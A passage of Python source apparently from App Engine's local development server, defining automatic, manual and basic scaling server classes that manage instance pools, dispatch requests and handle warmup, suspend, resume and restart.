return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files):
"""Initializer for AutoScalingServer.
Args:
server_configuration: An application_configuration.ServerConfiguration
instance storing the configuration data for a server.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced server for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Server and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this server.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
super(AutoScalingServer, self).__init__(server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files)
self._process_automatic_scaling(
self._server_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containg (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Server."""
self._balanced_server.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Server."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced server and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_server.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Server."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Server.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._server_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(peak_concurrent_requests /
self.max_instance_concurrent_requests))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Server that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Server exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingServer(Server):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
_MAX_REQUEST_WAIT_TIME = 10
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files):
"""Initializer for ManualScalingServer.
Args:
server_configuration: An application_configuration.ServerConfiguration
instance storing the configuration data for a server.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced server for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Server and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this server.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
super(ManualScalingServer, self).__init__(server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files)
self._process_manual_scaling(server_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the server has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Server."""
self._balanced_server.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in xrange(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Server."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced server and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_server.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Server."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._server_configuration.is_backend:
environ['BACKEND_ID'] = self._server_configuration.server_name
else:
environ['BACKEND_ID'] = (
self._server_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Server.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._server_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this server, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.ServerAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this server."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.ServerAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the the server, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingServer(Server):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files):
"""Initializer for BasicScalingServer.
Args:
server_configuration: An application_configuration.ServerConfiguration
instance storing the configuration data for a server.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced server for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Server and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this server.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
super(BasicScalingServer, self).__init__(server_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files)
self._process_basic_scaling(server_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Server."""
self._balanced_server.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Server."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced server and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_server.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Server."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._server_configuration.is_backend:
environ['BACKEND_ID'] = self._server_configuration.server_name
else:
environ['BACKEND_ID'] = (
self._server_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
